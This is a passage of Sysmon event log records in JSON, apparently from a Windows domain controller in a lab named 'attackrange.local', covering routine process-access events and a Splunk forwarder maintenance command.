07:53:27.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2086,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010B8EF0300}\r\nTargetProcessId: 2692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.830","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010B8EF0300}","TargetProcessId":"2692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2087,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.064\r\nSourceProcessGUID: {41C8662E-1F77-5F25-0000-0010B8EF0300}\r\nSourceProcessId: 2692\r\nSourceThreadId: 3948\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.064","SourceProcessGUID":"{41C8662E-1F77-5F25-0000-0010B8EF0300}","SourceProcessId":"2692","SourceThreadId":"3948","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2088,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.090\r\nProcessGuid: {41C8662E-1F78-5F25-0000-00106EF20300}\r\nProcessId: 2520\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.090","ProcessGuid":"{41C8662E-1F78-5F25-0000-00106EF20300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2089,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F78-5F25-0000-00106EF20300}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F78-5F25-0000-00106EF20300}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2090,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F78-5F25-0000-00106EF20300}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F78-5F25-0000-00106EF20300}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2091,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2092,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2093,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2094,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 